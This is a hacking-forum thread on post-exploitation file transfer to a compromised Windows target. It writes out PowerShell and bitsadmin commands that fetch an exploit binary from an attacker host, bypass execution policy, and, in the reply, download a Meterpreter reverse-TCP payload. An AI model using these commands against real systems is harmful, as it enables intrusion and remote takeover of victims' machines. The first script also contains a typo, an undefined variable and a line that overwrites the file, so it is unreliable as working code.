Results 1 to 2 of 2

Thread: Post Exploitation - wget using windows powershell and bitsadmin on target machine Share/Save - My123World.Com!

  1. #1

    Lightbulb Post Exploitation - wget using windows powershell and bitsadmin on target machine

    Assumptions:
    1) You got access on the windows system which support the Powershell and Bitsadmin
    Please note that bitsadmin is no logger supported on the windows, instead of bitsadmin we can use the powershell.

    Execute the following command on the target machine's limited shell

    Code:
    echo $storageDir = $pwd > wget.ps1
    echo $webclient = New-Object System.Net.WebClient >>wget.ps1
    echo $url = "http://192.168.0.1/winExp.exe" >>wget.ps1
    echo $webliclient.DownloadFile($url, $file) >>wget.ps1
    echo $storageDir = $pwd > wget.ps1
    Now, our wget.ps1 is ready for action i.e. now it should help attacker to transfer the exploit on the target windows machine.

    you can cross verify the wget.ps1 using
    Code:
    TYPE
    command.

    Now lets download file the using below given power-shell command.

    Code:
    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
    In some other cases some of the lower version of the windows doesn't support powershell. In this case you can use the bitsadmin utility to download the file in the target machine's directory.

    Code:
    bitsadmin /transfer myDownloadJob http://192.168.0.1/winExp.exe c:\Users\g4h\Desktop1.exe
    Last edited by [s]; 06-29-2016 at 04:05 PM.
    Garage4Hackers bugs for the community , of the community

    We provide IT
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    :
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  2. #2

    Red face

    There is another oneliner file downloader in Powershell :

    Code:
    $storageDir = $pwd $webclient = New-Object System.Net.WebClient $url = "http://192.168.0.1/met_revtcp_38_443.exe" $file = "met.exe" $webclient.DownloadFile($url,$file)
    Garage4Hackers bugs for the community , of the community

    We provide IT
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    :
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •